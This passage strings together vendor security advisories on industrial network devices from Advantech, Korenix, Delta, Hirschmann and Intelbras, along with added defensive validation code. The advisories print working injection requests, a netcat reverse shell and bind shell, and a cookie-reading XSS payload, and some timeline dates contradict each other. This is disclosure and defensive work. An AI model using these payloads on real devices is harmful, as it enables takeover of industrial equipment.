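An added example, not the vendor's code, of how the setsys handler could reject both payload classes shown in 1.1), 1.2) and 2) before a value reaches a shell or a fixed-size buffer: a length-bounded allow-list for ntp_name (the 64 bytes the vendor states for that field) and a conservative character class for sys_name, both applied to the decoded POST body. The sample bodies are constructed after the requests above; the 64-character policy for sys_name and the ntpdate argv in build_ntp_command() are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

NTP_MAX_BYTES = 64  # buffer size the vendor states for the NTP server field
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{LABEL}(?:\.{LABEL})*$")
DEVICE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # assumed policy for sys_name


def validate_ntp_server(value: str, max_bytes: int = NTP_MAX_BYTES) -> str:
    """Allow-list check for ntp_name: bounded byte length, then either an IP
    address or an RFC 1123 hostname. Shell metacharacters can never match."""
    if not 0 < len(value.encode("utf-8")) <= max_bytes:
        raise ValueError(f"ntp server must be 1..{max_bytes} bytes")
    try:
        ipaddress.ip_address(value)
        return value
    except ValueError:
        pass
    if not HOSTNAME_RE.fullmatch(value):
        raise ValueError("ntp server is neither a hostname nor an IP address")
    return value


def validate_device_name(value: str) -> str:
    """sys_name is interpolated into a command at boot; restrict it to a
    conservative character class instead of trying to escape it."""
    if not DEVICE_NAME_RE.fullmatch(value):
        raise ValueError("device name: letters, digits, '-' and '_' only, 1..64 chars")
    return value


def accepts(validator, value: str) -> bool:
    """True when validator() takes the value without raising ValueError."""
    try:
        validator(value)
        return True
    except ValueError:
        return False


def decode_form(body: str) -> dict:
    """application/x-www-form-urlencoded body -> {name: [values]}.
    Splits on '&' only, so a ';' in a value stays in the value and is inspected."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        if name:
            fields.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return fields


def check_setsys_body(body: str) -> dict:
    """Validate the injectable fields of a func=setsys POST body.
    Returns {field: error message}; an empty dict means the body is clean."""
    fields = decode_form(body)
    checks = {"ntp_name": validate_ntp_server, "sys_name": validate_device_name}
    errors = {}
    for field, validator in checks.items():
        for value in fields.get(field, []):
            if value == "":
                continue  # field left empty: nothing to validate
            try:
                validator(value)
            except ValueError as exc:
                errors[field] = str(exc)
    return errors


def build_ntp_command(value: str) -> list:
    """Hardened counterpart of the vulnerable step: the validated value becomes one
    argv element for subprocess.run(argv) with no shell and no string building.
    'ntpdate -u' is a placeholder for whatever the firmware really invokes."""
    return ["ntpdate", "-u", validate_ntp_server(value)]


# Constructed sample bodies, modelled on the advisory's requests.
INJECT_NTP = "web_en=1&sys_name=test&ntp_name=;ping+10.0.0.1;&tz=UTC12%3A0"
INJECT_SYSNAME = "web_en=1&sys_name=;ls+/etc;&ntp_name=&tz=UTC12%3A0"
OVERFLOW_NTP = "web_en=1&sys_name=test&ntp_name=" + "a" * 800 + "&tz=UTC12%3A0"
BENIGN = "web_en=1&sys_name=switch-01&ntp_name=pool.ntp.org&tz=UTC12%3A0"

if __name__ == "__main__":
    for label, body in [("inject ntp", INJECT_NTP), ("inject name", INJECT_SYSNAME),
                        ("overflow", OVERFLOW_NTP), ("benign", BENIGN)]:
        print(f"{label:12s} {check_setsys_body(body) or 'ok'}")
```

The length bound on its own would have prevented the overflow in 2), and the allow-list on its own would have prevented 1.1) and 1.2); applying both at the CGI boundary, before any copy into a stack buffer or any call into system(), closes all three with one check.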

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Update the product to the latest available firmware version.

Workaround

None

Recommendation

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.


Contact Timeline

  • 2023-03-08: Contacting Advantech via Service Request form; No answer.
  • 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware by 2023-05-13. Asked vendor for affected models; Vendor responded that EKI-1524/1522/1521 series are affected.
  • 2023-03-20: Asked for status update.
  • 2023-03-21: Vendor responded that the firmware is currently under testing.
  • 2023-03-31: Vendor stated that the firmware is done and sent it via email; Found additional issues and responded to vendor.
  • 2023-04-01: Vendor asked multiple questions.
  • 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed.
  • 2023-04-04: Set date for a call to 2023-04-10.
  • 2023-04-10: Clarified further issues.
  • 2023-04-23: Vendor sent notification that a beta release of the firmware is available.
  • 2023-05-02: Vendor sent notification that a new firmware release is online.
  • 2023-05-04: Asked vendor if the advisory can be published earlier than agreed.
  • 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed.
  • 2023-05-11: Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems, firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.

[EN] Multiple Vulnerabilities in Korenix JetWave Series https://cyberdanube.com/en/en-multiple-vulnerabilities-in-korenix-jetwave-series/ Mon, 13 Feb 2023 14:14:20 +0000 https://cyberdanube.com/en/?p=4273

Title: Multiple Vulnerabilities
Product: JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, JetWave 2414/2114, JetWave 2424, JetWave 2460, JetWave 3220/3420 V3
Vulnerable version: See “Vulnerable Versions”
Fixed version: See “Solution”
CVE: CVE-2023-23294, CVE-2023-23295, CVE-2023-23296
Impact: High
Homepage: https://korenix.com
Found: 2022-11-28


Multiple JetWave products from Korenix are prone to command injection and denial of service (DoS) vulnerabilities.

Vendor description

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.
[…]
Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners.”

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions

The following firmware versions have been found to be vulnerable by CyberDanube:

  • Korenix JetWave4221 HP-E <= V1.3.0
  • Korenix JetWave 3220/3420 V3 < V1.7

The following firmware versions have been identified to be vulnerable by the vendor:

  • Korenix JetWave 2212G V1.3.T
  • Korenix JetWave 2212X/2112S V1.3.0
  • Korenix JetWave 2211C < V1.6
  • Korenix JetWave 2411/2111 < V1.5
  • Korenix JetWave 2411L/2111L < V1.6
  • Korenix JetWave 2414/2114 < V1.4
  • Korenix JetWave 2424 < V1.3
  • Korenix JetWave 2460 < V1.6

Vulnerability overview

1) Authenticated Command Injection (CVE-2023-23294, CVE-2023-23295)
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

2) Authenticated Denial of Web-Service (CVE-2023-23296)
When logged in, a user can issue a POST request such that the underlying binary exits. The Web-Service becomes unavailable and cannot be accessed until the device gets rebooted.

Proof of Concept

1) Authenticated Command Injection

1.a) – CVE-2023-23294
The command “touch /tmp/poc” was injected into the system by using the following POST request:

POST /goform/formTFTPLoadSave HTTP/1.1
Host: 172.16.0.38
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: http://172.16.0.38
Connection: close
Referer: http://172.16.0.38/mgmtsaveconf.asp
Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45
Upgrade-Insecure-Requests: 1

submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit

The command gets executed as root and a file under the folder /tmp/ is created.

1.b) – CVE-2023-23295
The command “touch /tmp/poc2” was injected to the system by using the following POST request:

POST /goform/formSysCmd HTTP/1.1
Host: 172.16.0.38
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: 172.16.0.38
Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb
Content-Length: 40

sysCmd=touch%20/tmp/poc2&submit-url=

The command gets executed as root and a file under the folder /tmp/ is created. Command output is written into /tmp/syscmd.

2) Authenticated Denial of Web-Service (CVE-2023-23296)

The goahead process crashes when the following POST request is sent to the endpoint /goform/formDefault:

POST /goform/formDefault HTTP/1.1
Host: 172.16.0.38
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://172.16.0.38
Connection: close
Referer: http://172.16.0.38/toolping.asp
Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356
Upgrade-Insecure-Requests: 1

PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping

The output was observed on the terminal using our emulated instance:

rm: invalid option -- /
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary
Usage: rm [OPTION]... FILE...

Remove (unlink) the FILE(s). You may use '--' to
indicate that all following arguments are non-options.

Options:
-i always prompt before removing each destination
-f remove existing destinations, never prompt
-r or -R remove the contents of directories recursively

killall: wlwatchdog: no process killed
killall: wlapwatchdog: no process killed

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Owners of these products are advised to update to the following versions:

  • Korenix JetWave 4221 HP-E V1.4.0
  • Korenix JetWave 2212G V1.10
  • Korenix JetWave 2212X/2112S V1.11
  • Korenix JetWave 2211C V1.6
  • Korenix JetWave 2411/2111 V1.5
  • Korenix JetWave 2411L/2111L V1.6
  • Korenix JetWave 2414/2114 V1.4
  • Korenix JetWave 2424 V1.3
  • Korenix JetWave 2460 V1.6
  • Korenix JetWave 3220/3420 V3 V1.7

Workaround

None

Recommendation

CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.


Contact Timeline

  • 2022-12-05: Contacting Beijer Electronics Group via cs@beijerelectronics.com
  • 2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months.
  • 2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that not only the JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the advisory until the other products have been patched.
  • 2023-01-30: Meeting with Beijer Electronics. Customers were informed about the issues. Fixes were published. The disclosure date was shifted to 2023-02-13 to provide a time window for patching.
  • 2023-02-13: Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

[EN] Authenticated Command Injection in Delta Electronics DVW-W02W2-E2 https://cyberdanube.com/en/en-authenticated-command-injection-in-delta-electronics-dvw-w02w2-e2/ Wed, 30 Nov 2022 09:50:42 +0000 https://cyberdanube.com/en/?p=4188

Title: Authenticated Command Injection
Product: Delta Electronics DVW-W02W2-E2
Vulnerable version: V2.42
Fixed version: V2.5.2
CVE: CVE-2022-42139
Impact: High
Homepage: https://www.deltaww.com
Found: 2022-08-01


Delta Electronics DVW-W02W2-E2 is prone to an authenticated command injection vulnerability. This vulnerability can be used to execute arbitrary commands on the device.

Vendor description

“Delta, founded in 1971, is a global provider of power and thermal management solutions. Its mission statement, “To provide innovative, clean and energy -efficient solutions for a better tomorrow,” focuses on addressing key environmental issues such as global climate change. As an energy-saving solutions provider with core competencies in power electronics and automation, Delta’s business categories include Power Electronics, Automation, and Infrastructure.”

Source: https://www.deltaww.com/en-US/about/aboutProfile

Vulnerable versions

DVW-W02W2-E2 / V2.42

Vulnerability overview

1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device, with all implications. If such a device is acting as a key device in an industrial network, or controls various critical equipment via serial ports, an attacker can do more extensive damage in the corresponding network.

Proof of Concept

1) Authenticated Command Injection

The web server is prone to an authenticated command injection via POST parameters. This is only possible if the “timestamp” parameter is set correctly in the URL. The following proof-of-concept shows how to open a port binding shell on port 8889 with a “utelnetd” listener:

POST /apply.cgi?/MT_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1
Host: 192.168.3.148
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
Origin: http://192.168.3.148
Connection: close
Referer: http://192.168.3.148/MT_ping.htm
Cookie: xxid=1973719449
Upgrade-Insecure-Requests: 1

submit_flag=mt_ping&hid_ver1=&hid_ser1=&hid_comm1=&hid_ver2=&hid_ser2=&hid_comm2=&destination=`utelnetd%20-p%208889%20-l%20/bin/ash%20-d`

To access the device, the command “netcat” can be used:

$ nc 192.168.3.150 8889
����!����

BusyBox v1.4.2 (2016-08-18 22:45:41 EDT) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ #

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Update to firmware version V2.5.2.

Workaround

None

Recommendation

CyberDanube recommends Delta Electronics customers to upgrade the firmware to the latest version available.


References

Contact Timeline

  • 2022-08-02: Contacting Delta Electronics.
  • 2022-08-10: Vendor requested the advisory without encryption; Sent advisory to Delta Electronics.
  • 2022-08-16: Security contact asked a few questions regarding responsible disclosure; Sent answers.
  • 2022-08-30: Asked for an update.
  • 2022-09-01: Vendor responded that they will need more time to resolve the issues; Provided an additional 30 days (until 2022-11-02) for patching.
  • 2022-10-11: Asked for an update.
  • 2022-10-12: Vendor responded that fixing will be done by 2022-11-15; Shifted release date to this date.
  • 2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted advisory release date to the same day.
  • 2022-10-17: Asked for an update regarding the release; No answer.
  • 2022-10-18: Asked for an update and shifted release date to 2022-10-22.
  • 2022-10-19: Vendor responded that there were problems releasing the patch. Contact stated that the patch will be delayed until the end of November.
  • 2022-10-21: Asked vendor for a concrete release date; No answer.
  • 2022-10-28: Announced advisory release date of 2022-10-30 to vendor.
  • 2022-10-29: Found firmware patches with issue date 2022-11-25 on the vendor's website.
  • 2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

[EN] Multiple Vulnerabilities in Delta Electronics DX-2100-L1-CN https://cyberdanube.com/en/en-multiple-vulnerabilities-in-delta-electronics-dx-2100-l1-cn/ Wed, 30 Nov 2022 09:50:28 +0000 https://cyberdanube.com/en/?p=4194

Title: Multiple Vulnerabilities
Product: Delta Electronics DX-2100-L1-CN
Vulnerable version: V1.5.0.10
Fixed version: V1.5.0.12
CVE: CVE-2022-42140, CVE-2022-42141
Impact: High
Homepage: https://www.deltaww.com
Found: 2022-08-01


Delta Electronics DX-2100-L1-CN is prone to authenticated command injection and a stored cross-site scripting (XSS) vulnerability. The XSS vulnerability can be used to execute arbitrary commands in the context of a user’s browser. The command injection allows an attacker to execute system commands on the device itself.

Vendor description

“Delta, founded in 1971, is a global provider of power and thermal management solutions. Its mission statement, “To provide innovative, clean and energy -efficient solutions for a better tomorrow,” focuses on addressing key environmental issues such as global climate change. As an energy-saving solutions provider with core competencies in power electronics and automation, Delta’s business categories include Power Electronics, Automation, and Infrastructure.”

Source: https://www.deltaww.com/en-US/about/aboutProfile

Vulnerable versions

DX-2100-L1-CN / V1.5.0.10

Vulnerability overview

1) Authenticated Command Injection (CVE-2022-42140)
An authenticated command injection has been identified in the web configuration service of the device. It can be used to execute system commands on the device's operating system in the context of the user “root”. Therefore, a full compromise of the device is possible with credentials for the web service only.

2) Stored Cross-Site Scripting (CVE-2022-42141)
A stored cross-site scripting vulnerability has been identified in the function “net diagnosis” on the device’s web configuration service. This can be exploited in the context of a victim’s session.

Proof of Concept

1) Authenticated Command Injection

The parameter “diagnose_address” contains the payload “;ls /;”, which lists the contents of the root directory on the serial terminal of the device.

http://192.168.3.150/lform/net_diagnose?action=diagnose&diagnose_type=0&diagnose_address=;ls%20/;

The output can be seen in the context of a virtualized firmware clone, as used to find this vulnerability, but is usually invisible to a customer. Therefore, a more visible payload may be commands that interact via the network, like “;ping 192.168.0.10;”. This command will ping a device on the corresponding IP address within the local network.

2) Stored Cross-Site Scripting

The following request stores JavaScript that displays the cookies of a user’s session on the screen. The script is stored on the device permanently.

POST /lform/urlfilter?action=save HTTP/1.1
Host: 192.168.3.150
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
Connection: keep-alive
Cookie: language=en_US; userindex=1; loginexpire=1648630746607; session=30

lan_ipaddr=192.168.5.5&lan_netmask=255.255.255.0&src_addr_start=&src_addr_end=&editnum=0&bfilter_urllist=0&url_addr=<script>alert(document.cookie)</script>&src_addr_type=0&filter_state=1

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
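As an added illustration (not code from Delta Electronics or from this advisory), the following Python places the rendering pattern the stored XSS PoC implies next to the two controls that prevent it, output encoding and an allow-list on save; the table markup, function names and the allow-list grammar are assumptions.

```python
import html
import re

# The stored value of "url_addr" from the PoC request above (constructed copy).
STORED_PAYLOAD = "<script>alert(document.cookie)</script>"

def render_filter_row_vulnerable(url_addr: str) -> str:
    """The pattern the PoC implies: the stored filter entry is concatenated into
    the page unescaped, so markup inside it becomes part of the DOM."""
    return "<tr><td>" + url_addr + "</td></tr>"

def render_filter_row_hardened(url_addr: str) -> str:
    """Output encoding: every stored value is HTML-escaped on the way out, so
    the browser shows the payload as text instead of executing it."""
    return "<tr><td>" + html.escape(url_addr, quote=True) + "</td></tr>"

# A URL filter entry is a hostname, an IPv4 address or a path fragment; nothing
# in that grammar needs '<', '>', quotes or whitespace (assumed allow-list).
URL_FILTER_ENTRY = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]{0,254}$")

def accept_url_filter_entry(url_addr: str) -> bool:
    """Input validation for /lform/urlfilter?action=save: entries outside the
    allow-list are rejected before they are ever stored."""
    return URL_FILTER_ENTRY.match(url_addr) is not None

if __name__ == "__main__":
    print(render_filter_row_vulnerable(STORED_PAYLOAD))
    print(render_filter_row_hardened(STORED_PAYLOAD))
    print(accept_url_filter_entry(STORED_PAYLOAD), accept_url_filter_entry("example.com/ads"))
```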

Solution

Update to firmware version V1.5.0.12.

Workaround

None

Recommendation

CyberDanube recommends Delta Electronics customers to upgrade the firmware to the latest version available.


References

Contact Timeline

  • 2022-08-02: Contacting Delta Electronics.
  • 2022-08-10: Vendor requested the advisory without encryption; Sent advisory to Delta Electronics.
  • 2022-08-16: Security contact asked a few questions regarding responsible disclosure; Sent answers.
  • 2022-08-30: Asked for an update.
  • 2022-09-01: Vendor responded that they will need more time to resolve the issues; Provided an additional 30 days (until 2022-11-02) for patching.
  • 2022-10-11: Asked for an update.
  • 2022-10-12: Vendor responded that fixing will be done by 2022-11-15; Shifted release date to this date.
  • 2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted advisory release date to the same day.
  • 2022-10-17: Asked for an update regarding the release; No answer.
  • 2022-10-18: Asked for an update and shifted release date to 2022-10-22.
  • 2022-10-19: Vendor responded that there were problems releasing the patch. Contact stated that the patch will be delayed until the end of November.
  • 2022-10-21: Asked vendor for a concrete release date; No answer.
  • 2022-10-28: Announced advisory release date of 2022-10-30 to vendor.
  • 2022-10-29: Found firmware patches with issue date 2022-11-25 on the vendor's website.
  • 2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

[EN] Authenticated Command Injection in Hirschmann (Belden) BAT-C2 https://cyberdanube.com/en/en-authenticated-command-injection-in-hirschmann-belden-bat-c2/ Thu, 24 Nov 2022 12:56:46 +0000 https://cyberdanube.com/en/?p=4172

Title: Multiple Critical Vulnerabilities
Product: Hirschmann (Belden) BAT-C2
Vulnerable version: 8.8.1.0R8
Fixed version: 09.13.01.00R04
CVE: CVE-2022-40282
Impact: High
Homepage: https://hirschmann.com/ | https://beldensolutions.com
Found: 2022-08-01


Hirschmann BAT-C2 is prone to an authenticated command injection vulnerability. This vulnerability can be used to execute arbitrary commands on the device.

Vendor description

“The Technology and Market Leader in Industrial Networking. Hirschmann™ develops innovative solutions, which are geared towards its customers’ requirements in terms of performance, efficiency and investment reliability.”

Source: https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtml

Vulnerable versions

Hirschmann (Belden) BAT-C2

Vulnerability overview

1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device, with all implications. If such a device is acting as a key device in an industrial network, or controls various critical equipment via serial ports, an attacker can do more extensive damage in the corresponding network.

Proof of Concept

1) Authenticated Command Injection

The command “ping 192.168.1.1” was injected to the system by using the following POST request:

POST / HTTP/1.1
Host: 192.168.3.150
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Origin: https://192.168.3.150
Authorization: Digest username="admin", realm="config", nonce="4b63bb796252d310", uri="/", algorithm=MD5, response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a, cnonce="99c14d39557e691d"
Referer: https://192.168.3.150/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

ajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Upgrade to firmware version 09.13.01.00R04 or above.

A security bulletin for this vulnerability has been published by the vendor:
https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/

Workaround

None

Recommendation

CyberDanube recommends customers from Hirschmann to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.


References

Contact Timeline

  • 2022-08-03: Contacting Hirschmann via BEL-SM-PSIRT@belden.com; Belden contact suspects a duplicate. Asked contact for more information.
  • 2022-08-18: Belden representative sent more information for clarification. Highlighted differences between PoCs.
  • 2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.
  • 2022-08-30: Asked for an update.
  • 2022-08-31: Vendor stated that they will release another security bulletin for this vulnerability.
  • 2022-09-27: Asked for an update.
  • 2022-09-28: Vendor is currently testing the new firmware version and has also been assigned a CVE number. A draft of the security bulletin was also sent by the security contact.
  • 2022-10-12: Asked for an update.
  • 2022-10-13: Belden contact stated that there is no publication date for now, as another patch must be integrated.
  • 2022-10-28: Security contact informed us that the patch will be released within the next two weeks.
  • 2022-11-22: Asked for a status update; Security contact stated that the release was delayed due to internal reasons.
  • 2022-11-23: Vendor sent the final version of the security bulletins. The release of the new firmware version will be 2022-11-28.
  • 2022-11-24: Vendor informed CyberDanube that the release of the bulletin and the firmware was done on 2022-11-23 by the marketing team. Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

[EN] Authenticated Command Injection in Intelbras WiFiber 120AC inMesh https://cyberdanube.com/en/authenticated-command-injection-in-intelbras-wifiber-120ac-inmesh/ Sun, 09 Oct 2022 16:09:09 +0000 https://cyberdanube.com/en/?p=4134

Title: Authenticated Command Injection
Product: Intelbras WiFiber 120AC inMesh
Vulnerable version: 1.1-220216
Fixed version: 1-1-220826
CVE: CVE-2022-40005
Impact: High
Homepage: https://www.intelbras.com
Found: 2022-08-01


The Intelbras WiFiber 120AC inMesh is prone to an authenticated command injection vulnerability. This vulnerability can be used to execute arbitrary commands on the device.

Vendor description

“We are Intelbras. A company that for 45 years has been offering innovative solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an INspiration and a promising idea: to manufacture PABX centrals. During the 80’s, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s were marked by the consolidation of the company in the telecommunications segment and we became leaders in the PABX and telephone terminals segment. The turn of the millennium represented the search for greater connection and proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC. We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our DNA, increasingly present in our daily lives. And it was only possible to write a story so full of achievements because employees, partners and customers were close and believed in us.”

Source: https://www.intelbras.com/en/institutional/who-we-are

Vulnerable versions

WiFiber 120AC inMesh / 1.1-220216

Vulnerability overview

1) Authenticated Command Injection
An authenticated command injection has been identified in the web configuration service of the device. It can be used to execute system commands on the device's operating system in the context of the user “root”. Therefore, a full compromise of the device is possible with credentials for the web service only.

Proof of Concept

1) Authenticated Command Injection

The web server is prone to an authenticated command injection via POST parameters. The following proof-of-concept shows how to inject the command “ls /” into the system, where it gets executed in the background:

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.3.147
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/ping6.asp
Upgrade-Insecure-Requests: 1

pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908

The following commands can be used to open a reverse shell:

"rm -f /tmp/f"
"mkfifo /tmp/f"
"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"

Those commands were sent via a crafted POST request:

POST /boaform/formTracert HTTP/1.1
Host: 192.168.3.147
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/tracert.asp
Upgrade-Insecure-Requests: 1

proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
